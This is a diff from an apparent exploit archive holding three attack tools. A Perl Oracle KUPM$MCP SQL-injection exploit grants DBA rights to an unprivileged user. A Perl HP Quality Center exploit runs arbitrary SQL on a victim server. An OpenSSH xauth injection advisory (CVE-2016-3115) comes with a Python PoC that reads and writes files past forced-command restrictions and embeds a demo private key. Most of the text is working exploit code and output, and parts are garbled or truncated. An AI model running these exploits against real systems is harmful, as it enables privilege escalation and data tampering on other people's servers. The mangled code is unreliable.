-# [-] Creating evil function...
-# [-] Go ...(don't worry about errors)!
-# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874
-# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
-# BEGIN
-# SYS.KUPM$MCP.MAIN(''' AND 0=BUNKER.own--','');
-# END;"] at kupm-mcpmain.pl line 119.
-# [-] YOU GOT THE POWAH!!
-#
-# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r
-# [-] Wait...
-# [-] Revoking DBA from BUNKER...
-# [-] Done!
-#
-
-use warnings;
-use strict;
-use DBI;
-use Getopt::Std;
-use vars qw/ %opt /;
-
-sub usage {
- print <<"USAGE";
-
-Syntax: $0 -h -s -u -p -g|-r [-P ]
-
-Options:
- -h target server address
- -s target sid name
- -u user
- -p password
-
- -g|-r (g)rant dba to user | (r)evoke dba from user
- [-P Oracle port]
-
-USAGE
- exit 0
-}
-
-my $opt_string = 'h:s:u:p:grP:';
-getopts($opt_string, \%opt) or &usage;
-&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
-&usage if ( !$opt{g} and !$opt{r} );
-my $user = uc $opt{u};
-
-my $dbh = undef;
-if ($opt{P}) {
- $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
-} else {
- $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
-}
-
-my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";
-print "[-] Wait...\n";
-
-if ($opt{r}) {
- print "[-] Revoking DBA from $user...\n";
- $sqlcmd = "REVOKE DBA FROM $user";
- $dbh->do( $sqlcmd );
- print "[-] Done!\n";
- $dbh->disconnect;
- exit;
-}
-
-print "[-] Creating evil function...\n";
-$dbh->do( qq{
-CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
- AUTHID CURRENT_USER AS
- PRAGMA AUTONOMOUS_TRANSACTION;
-BEGIN
- EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
- RETURN(0);
-END;
-} );
-
-print "[-] Go ...(don't worry about errors)!\n";
-my $sth = $dbh->prepare( qq{
-BEGIN
- SYS.KUPM\$MCP.MAIN(''' AND 0=$user.own--','');
-END;});
-$sth->execute;
-$sth->finish;
-print "[-] YOU GOT THE POWAH!!\n";
-$dbh->disconnect;
-exit;
-
-# milw0rm.com [2007-03-27]
+#!/usr/bin/perl
+#
+# Remote Oracle KUPM$MCP.MAIN exploit (10g)
+#
+# Grant or revoke dba permission to unprivileged user
+#
+# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
+#
+# REF: http://www.red-database-security.com/
+#
+# AUTHOR: Andrea "bunker" Purificato
+# http://rawlab.mindcreations.com
+#
+# DATE: Copyright 2007 - Tue Mar 27 10:47:14 CEST 2007
+#
+# Oracle InstantClient (basic + sdk) required for DBD::Oracle
+#
+# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r
+# [-] Wait...
+# [-] Revoking DBA from BUNKER...
+# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmain.pl line 97.
+# [-] Done!
+#
+# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -g
+# [-] Wait...
+# [-] Creating evil function...
+# [-] Go ...(don't worry about errors)!
+# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874
+# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
+# BEGIN
+# SYS.KUPM$MCP.MAIN(''' AND 0=BUNKER.own--','');
+# END;"] at kupm-mcpmain.pl line 119.
+# [-] YOU GOT THE POWAH!!
+#
+# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r
+# [-] Wait...
+# [-] Revoking DBA from BUNKER...
+# [-] Done!
+#
+
+use warnings;
+use strict;
+use DBI;
+use Getopt::Std;
+use vars qw/ %opt /;
+
+sub usage {
+ print <<"USAGE";
+
+Syntax: $0 -h -s -u -p -g|-r [-P ]
+
+Options:
+ -h target server address
+ -s target sid name
+ -u user
+ -p password
+
+ -g|-r (g)rant dba to user | (r)evoke dba from user
+ [-P Oracle port]
+
+USAGE
+ exit 0
+}
+
+my $opt_string = 'h:s:u:p:grP:';
+getopts($opt_string, \%opt) or &usage;
+&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
+&usage if ( !$opt{g} and !$opt{r} );
+my $user = uc $opt{u};
+
+my $dbh = undef;
+if ($opt{P}) {
+ $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
+} else {
+ $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
+}
+
+my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";
+print "[-] Wait...\n";
+
+if ($opt{r}) {
+ print "[-] Revoking DBA from $user...\n";
+ $sqlcmd = "REVOKE DBA FROM $user";
+ $dbh->do( $sqlcmd );
+ print "[-] Done!\n";
+ $dbh->disconnect;
+ exit;
+}
+
+print "[-] Creating evil function...\n";
+$dbh->do( qq{
+CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
+ AUTHID CURRENT_USER AS
+ PRAGMA AUTONOMOUS_TRANSACTION;
+BEGIN
+ EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
+ RETURN(0);
+END;
+} );
+
+print "[-] Go ...(don't worry about errors)!\n";
+my $sth = $dbh->prepare( qq{
+BEGIN
+ SYS.KUPM\$MCP.MAIN(''' AND 0=$user.own--','');
+END;});
+$sth->execute;
+$sth->finish;
+print "[-] YOU GOT THE POWAH!!\n";
+$dbh->disconnect;
+exit;
+
+# milw0rm.com [2007-03-27]
diff --git a/platforms/multiple/remote/3654.pl b/platforms/multiple/remote/3654.pl
index 5bc67df76..3a4c2f85e 100755
--- a/platforms/multiple/remote/3654.pl
+++ b/platforms/multiple/remote/3654.pl
@@ -1,165 +1,165 @@ -#!/usr/bin/perl -#****************************************************************** -# HP Mercury Quality Center runQuery exploit. -# Run whatever SQL you want on there db - without SQL injection. -# Problem is client can do "RunQuery" command os we write program -# to do this. Client can lots other things it should not also! -# The backend database can be MSSQLServer or Oracle or nearly often -# MSDE. This changes SQL types you can send. This is a blind SQL -# attack but may be is it possible to get data out somehow? -# -# Copyright 2007 Isma Khan - Code may be freedly usuable on other -# exploits as long as name appears. -# ****************************************************************** -use IO::Socket; -my $sql = "UPDATE USERS SET US_ADDRESS='0wned' WHERE US_USERNAME='paul_qc'"; - -#my $sql = "UPDATE USERS SET US_ADDRESS='0wned' WHERE US_USERNAME='isma-khan'"; -# victim - Put yur victims hostname here. -# vicport - Port to connect on. -# u - username to login to quality center. This user provided. -# p - Psswrd to login ot quality center. Try default passwords. -# domain - A domain thhat user has access to. -# project - A proj that user has access to. -my $victim = '192.168.0.2'; -my $vicport = 8080; -my $u = 'alex_qc'; -my $p= ''; -my $domain = 'DEFAULT'; -my $project = 'QualityCenter_Demo'; - -# ****** Login to HPQMC ******************* -print "Login\n"; -my @bits; -push @bits, AddString('Login'); -push @bits, "\"0:int:1\""; -push @bits, "\"0:int:-1\""; -push @bits, "\"0:int:-1\""; -push @bits, AddString("{\r\nUSER_NAME:$u,\r\nPASSWORD:" . SmolkaEncript($p) . ",\r\nCLIENTTYPE:\\00000018\\Quality Center Client UI\r\n}\r\n"); -my $tmphost="0:conststr:Bannu"; -push @bits, "\\" . MakeHex($tmphost) . "\\" . 
$tmphost; -push @bits, "\"65536:str:0\""; -push @bits, "\"0:pint:0\""; -push @bits, "\"0:pint:0\""; -push @bits, "\"0:pint:0\""; - -my $res=HTTPSending(@bits); -undef @bits; -my ($sesid) = $res =~ /ID:(\d+)/; -die "Not login\n" unless($sesid); -print "Session ID: $sesid\n"; - -# ***** Connect to project ********* -print "Connect to project\n"; -push @bits, AddString('ConnectProject'); -push @bits, "\"0:int:2\""; -push @bits, "\"0:int:$sesid\""; -push @bits, "\"0:int:-1\""; -push @bits, AddString("{\r\nDOMAIN_NAME:$domain,\r\nPROJECT_NAME:\\" . MakeHex($project) . "\\$project\r\n}\r\n"); -push @bits, "\"65536:str:0\""; -push @bits, "\"0:pint:0\""; -$res = HTTPSending(@bits); -undef @bits; -my ($psesid) = $res =~ /ID:(\d+)/; -die "Not project\n" unless($psesid); -print "Project Session ID: $psesid\n"; - -# ******** Run the SQL ***** -print "Run SQL\n"; -push @bits, AddString('RunQuery'); -push @bits, "\"0:int:3\""; -push @bits, "\"0:int:$sesid\""; -push @bits, "\"0:int:$psesid\""; -push @bits, AddString($sql); -push @bits, "\"65536:str:0\""; -push @bits, "\"0:int:0\""; -$res = HTTPSending(@bits); -print $res; - -# **** Expect to get Failed to Run Query[ERR_SEP]Messages: -# error here but SQL like INSERT or UPDATE still work. - -#****************************************************************** -# Make password -#****************************************************************** -sub SmolkaEncript { - my $password=shift; - return '' unless($password); - my $cripted='ENRCRYPTED'; - my $base = 'SmolkaWasHereMonSher'; - my $x=0; - for(;$xnew(proto=>'tcp',PeerAddr=>$victim,PeerPort=>$vicport) - or die "Can't connect. $!\n"; - my $header = "POST /qcbin/servlet/tdservlet/TDAPI_GeneralWebTreatment HTTP/1.0\r\n" -. "Content-Type: text/html; charset=UTF-8\r\n" -. "X-TD-ID: " . sprintf("%08X",XTDID($body)). "\r\n" -. "User-Agent: TeamSoft WinInet Component\r\n" -. "Content-Length: " . length($body) . "\r\n" -. "Pragma: no-cache\r\n" -. 
"\r\n"; - print $sock $header; - print $sock $body; - my $text; - while(!eof($sock)){ - $text .= <$sock>; - } - return $text; -} - -# ********* HPMQCs conststr type ********* -sub AddString { - my $str = shift; - if (length($str)<16){ - return "\"0:conststr:$str\""; - } else { - return '\\' . MakeHex("0:conststr:$str") . "\\0:conststr:$str"; - } - -} -# ********HPMQC uses hex digits in many place ************ -sub MakeHex { - return sprintf("%08x",length(shift)); -} - -# ******************************************************** -# This takes @bits and make big longer string out of it. -# ******************************************************* -sub bits2string { - my @bits=@_; - my $bitno = 0; - my $retstr="{\r\n"; - foreach my $onebit (@bits){ - $retstr .= $bitno++ . ": $onebit,\r\n"; - } - $retstr = substr($retstr,0,-3); - $retstr = $retstr . "\r\n}\r\n"; - return $retstr; -} - -# ************************************************* -# HPMQC useid X-TD-ID header which is sum of all chars -# in body plus number 2301. Could checksum? -# ********************************************** -sub XTDID { - my $total=2301; - my $body = shift; - - for(my $i=0;$inew(proto=>'tcp',PeerAddr=>$victim,PeerPort=>$vicport) + or die "Can't connect. $!\n"; + my $header = "POST /qcbin/servlet/tdservlet/TDAPI_GeneralWebTreatment HTTP/1.0\r\n" +. "Content-Type: text/html; charset=UTF-8\r\n" +. "X-TD-ID: " . sprintf("%08X",XTDID($body)). "\r\n" +. "User-Agent: TeamSoft WinInet Component\r\n" +. "Content-Length: " . length($body) . "\r\n" +. "Pragma: no-cache\r\n" +. "\r\n"; + print $sock $header; + print $sock $body; + my $text; + while(!eof($sock)){ + $text .= <$sock>; + } + return $text; +} + +# ********* HPMQCs conststr type ********* +sub AddString { + my $str = shift; + if (length($str)<16){ + return "\"0:conststr:$str\""; + } else { + return '\\' . MakeHex("0:conststr:$str") . 
"\\0:conststr:$str"; + } + +} +# ********HPMQC uses hex digits in many place ************ +sub MakeHex { + return sprintf("%08x",length(shift)); +} + +# ******************************************************** +# This takes @bits and make big longer string out of it. +# ******************************************************* +sub bits2string { + my @bits=@_; + my $bitno = 0; + my $retstr="{\r\n"; + foreach my $onebit (@bits){ + $retstr .= $bitno++ . ": $onebit,\r\n"; + } + $retstr = substr($retstr,0,-3); + $retstr = $retstr . "\r\n}\r\n"; + return $retstr; +} + +# ************************************************* +# HPMQC useid X-TD-ID header which is sum of all chars +# in body plus number 2301. Could checksum? +# ********************************************** +sub XTDID { + my $total=2301; + my $body = shift; + + for(my $i=0;$i +Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 +Version: 0.2 +Date: Mar 3rd, 2016 + +Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass + +Overview +-------- + +Name: openssh +Vendor: OpenBSD +References: * http://www.openssh.com/[1] + +Version: 7.2p1 [2] +Latest Version: 7.2p1 +Other Versions: <= 7.2p1 (all versions; dating back ~20 years) +Platform(s): linux +Technology: c + +Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection') +Origin: remote +Min. Privs.: post auth + +CVE: CVE-2016-3115 + + + +Description +--------- + +quote website [1] + +> OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options. +Summary +------- + +An authenticated user may inject arbitrary xauth commands by sending an +x11 channel request that includes a newline character in the x11 cookie. 
+The newline acts as a command separator to the xauth binary. This attack requires +the server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector. + +By injecting xauth commands one gains limited* read/write arbitrary files, +information leakage or xauth-connect capabilities. These capabilities can be +leveraged by an authenticated restricted user - e.g. one with the login shell +configured as /bin/false or one with configured forced-commands - to bypass +account restriction. This is generally not expected. + +The injected xauth commands are performed with the effective permissions of the +logged in user as the sshd already dropped its privileges. + +Quick-Info: + +* requires: X11Forwarding yes +* bypasses /bin/false and forced-commands +** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear) +* does not bypass /bin/nologin (as there is special treatment for this) + +Capabilities (xauth): + +* Xauth + * write file: limited chars, xauthdb format + * read file: limit lines cut at first \s + * infoleak: environment + * connect to other devices (may allow port probing) + + +PoC see ref github. +Patch see ref github. + + +Details +------- + +// see annotated code below + + * server_input_channel_req (serverloop.c) + *- session_input_channel_req:2299 (session.c [2]) + *- session_x11_req:2181 + + * do_exec_pty or do_exec_no_pty + *- do_child + *- do_rc_files (session.c:1335 [2]) + +Upon receiving an `x11-req` type channel request sshd parses the channel request +parameters `auth_proto` and `auth_data` from the client ssh packet where +`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`) +and `auth_data` contains the actual x11 auth cookie. This information is stored +in a session specific datastore. When calling `execute` on that session, sshd will +call `do_rc_files` which tries to figure out if this is an x11 call by evaluating +if `auth_proto` and `auth_data` (and `display`) are set. 
If that is the case AND +there is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc` +is set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`. +Note that `auth_data` nor `auth_proto` was sanitized or validated, it just contains +user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a +command-separator to the `xauth` binary, this allows a client to inject arbitrary +`xauth` commands. + +Sidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted +input as arguments to that script. +Sidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3] + +This is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth +command injection: + + SYNOPSIS + xauth [ -f authfile ] [ -vqibn ] [ command arg ... ] + + add displayname protocolname hexkey + generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata] + [n]extract filename displayname... + [n]list [displayname...] + [n]merge [filename...] + remove displayname... + source filename + info + exit + quit + version + help + ? + +Interesting commands are: + + info - leaks environment information / path + ~# xauth info + xauth: file /root/.Xauthority does not exist + Authority file: /root/.Xauthority + File new: yes + File locked: no + Number of entries: 0 + Changes honored: yes + Changes made: no + Current input: (argv):1 + + source - arbitrary file read (cut on first `\s`) + # xauth source /etc/shadow + xauth: file /root/.Xauthority does not exist + xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::" + + extract - arbitrary file write + * limited characters + * in xauth.db format + * since it is not compressed it can be combined with `xauth add` to + first store data in the database and then export it to an arbitrary + location e.g. to plant a shell or do other things. 
+ + generate - connect to : (port probing, connect back and pot. exploit + vulnerabilities in X.org + + +Source +------ + +Inline annotations are prefixed with `//#!` + + +/* + * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found + * first in this order). + */ +static void +do_rc_files(Session *s, const char *shell) +{ +... + snprintf(cmd, sizeof cmd, "%s -q -", + options.xauth_location); + f = popen(cmd, "w"); //#! run xauth -q - + if (f) { + fprintf(f, "remove %s\n", //#! remove - injecting \n auth_display injects xauth command + s->auth_display); + fprintf(f, "add %s %s %s\n", //#! \n injection + s->auth_display, s->auth_proto, + s->auth_data); + pclose(f); + } else { + fprintf(stderr, "Could not run %s\n", + cmd); + } + } +} + +Proof of Concept +---------------- + +Prerequisites: + +* install python 2.7.x +* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x +* make sure `poc.py` + + + Usage: + + path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key + + +poc: + +1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`: + +#PUBKEY line - force commands: only allow "whoami" +#cat /home/user1/.ssh/authorized_keys +command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box + +#cat /etc/passwd +user2:x:1001:1002:,,,:/home/user2:/bin/false + +2. run sshd with `X11Forwarding yes` (kali default config) + +#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d + +3. 
`forced-commands` - connect with user1 and display env information + +#> python 22 user1 .demoprivkey + +INFO:__main__:add this line to your authorized_keys file: +#PUBKEY line - force commands: only allow "whoami" +#cat /home/user/.ssh/authorized_keys +command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box + +INFO:__main__:connecting to: user1:@host:22 +INFO:__main__:connected! +INFO:__main__: +Available commands: + .info + .readfile + .writefile + .exit .quit + + +#> .info +DEBUG:__main__:auth_cookie: '\ninfo' +DEBUG:__main__:dummy exec returned: None +INFO:__main__:Authority file: /home/user1/.Xauthority +File new: no +File locked: no +Number of entries: 1 +Changes honored: yes +Changes made: no +Current input: (stdin):3 +/usr/bin/xauth: (stdin):2: bad "add" command line +... + +4. `forced-commands` - read `/etc/passwd` + +... +#> .readfile /etc/passwd +DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n' +DEBUG:__main__:dummy exec returned: None +INFO:__main__:root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +... + +5. 
`forced-commands` - write `/tmp/testfile` + +#> .writefile /tmp/testfile `thisisatestfile` +DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa' +DEBUG:__main__:dummy exec returned: None +DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile 127.0.0.250:65500' +DEBUG:__main__:dummy exec returned: None +DEBUG:__main__:/usr/bin/xauth: (stdin):2: bad "add" command line + +#> ls -lsat /tmp/testfile +4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile + +#> cat /tmp/testfile +\FA65500hi\FA65500`thisisatestfile`\AA + +6. `/bin/false` - connect and read `/etc/passwd` + +#> python 22 user2 user2password +INFO:__main__:connecting to: user2:user2password@host:22 +INFO:__main__:connected! +INFO:__main__: +Available commands: + .info + .readfile + .writefile + .exit .quit + + +#> .readfile /etc/passwd +DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n' +DEBUG:__main__:dummy exec returned: None +INFO:__main__:root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +... +user2:x:1001:1002:,,,:/home/user2:/bin/false +... + +7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100 + +#> generate 8.8.8.8:100 . + +#> tcpdump +IP .42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0 + + +Mitigation / Workaround +------------------------ + +* disable x11-forwarding: `sshd_config` set `X11Forwarding no` +* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys` + +Notes +----- + +Verified, resolved and released within a few days. very impressive. 
+ +Vendor response: see advisory [5] + +References +---------- + +[1] http://www.openssh.com/ +[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388 +[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376 +[4] http://linux.die.net/man/1/xauth +[5] http://www.openssh.com/txt/x11fwd.adv +''' + +#!/usr/bin/env python +# -*- coding: UTF-8 -*- +# Author : +############################################################################### +# +# FOR DEMONSTRATION PURPOSES ONLY! +# +############################################################################### +import logging +import StringIO +import sys +import os + +LOGGER = logging.getLogger(__name__) +try: + import paramiko +except ImportError, ie: + logging.exception(ie) + logging.warning("Please install python-paramiko: pip install paramiko / easy_install paramiko / install python-paramiko") + sys.exit(1) + +class SSHX11fwdExploit(object): + def __init__(self, hostname, username, password, port=22, timeout=0.5, + pkey=None, pkey_pass=None): + self.ssh = paramiko.SSHClient() + self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + if pkey: + pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass) + self.ssh.connect(hostname=hostname, port=port, + username=username, password=password, + timeout=timeout, banner_timeout=timeout, + look_for_keys=False, pkey=pkey) + + def exploit(self, cmd="xxxx\n?\nsource /etc/passwd\n"): + transport = self.ssh.get_transport() + session = transport.open_session() + LOGGER.debug("auth_cookie: %s"%repr(cmd)) + session.request_x11(auth_cookie=cmd) + LOGGER.debug("dummy exec returned: %s"%session.exec_command("")) + + transport.accept(0.5) + session.recv_exit_status() # block until exit code is ready + stdout, stderr = [],[] + while session.recv_ready(): + stdout.append(session.recv(4096)) + while session.recv_stderr_ready(): + 
stderr.append(session.recv_stderr(4096)) + session.close() + return ''.join(stdout)+''.join(stderr) # catch stdout, stderr + + def exploit_fwd_readfile(self, path): + data = self.exploit("xxxx\nsource %s\n"%path) + if "unable to open file" in data: + raise IOError(data) + ret = [] + for line in data.split('\n'): + st = line.split('unknown command "',1) + if len(st)==2: + ret.append(st[1].strip(' "')) + return '\n'.join(ret) + + def exploit_fwd_write_(self, path, data): + ''' + adds display with protocolname containing userdata. badchars= + + ''' + dummy_dispname = "127.0.0.250:65500" + ret = self.exploit('\nadd %s %s aa'%(dummy_dispname, data)) + if ret.count('bad "add" command line')>1: + raise Exception("could not store data most likely due to bad chars (no spaces, quotes): %s"%repr(data)) + LOGGER.debug(self.exploit('\nextract %s %s'%(path,dummy_dispname))) + return path + +demo_authorized_keys = '''#PUBKEY line - force commands: only allow "whoami" +#cat /home/user/.ssh/authorized_keys +command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box +''' +PRIVKEY = """-----BEGIN RSA PRIVATE KEY----- +MIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69 +9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn +PLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN +zKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts +U68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh +TLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH +SBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W +s1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O 
+aDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne +euQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T +A7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA +rhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe +DDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj +bDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc +KPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpBC9 +2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7DevGYuELXbOgY +nimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw +Gt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM +F0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f +W3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr +bjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/ +nY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL +b4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX +Ao8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV +pryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv +-----END RSA PRIVATE KEY-----""" + + +if __name__=="__main__": + logging.basicConfig(loglevel=logging.DEBUG) + LOGGER.setLevel(logging.DEBUG) + + if not len(sys.argv)>4: + print """ Usage: + + path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key + +""" + sys.exit(1) + hostname, port, username, password = sys.argv[1:] + port = int(port) + pkey = None + if os.path.isfile(password): + password = None + with open(password,'r') as f: + pkey = f.read() + elif password==".demoprivkey": + pkey = PRIVKEY + password = None + LOGGER.info("add this line to your authorized_keys file: \n%s"%demo_authorized_keys) + + LOGGER.info("connecting to: %s:%s@%s:%s"%(username,password if not pkey else "", hostname, port)) + ex = SSHX11fwdExploit(hostname, port=port, + username=username, password=password, + pkey=pkey, + timeout=10 + ) + 
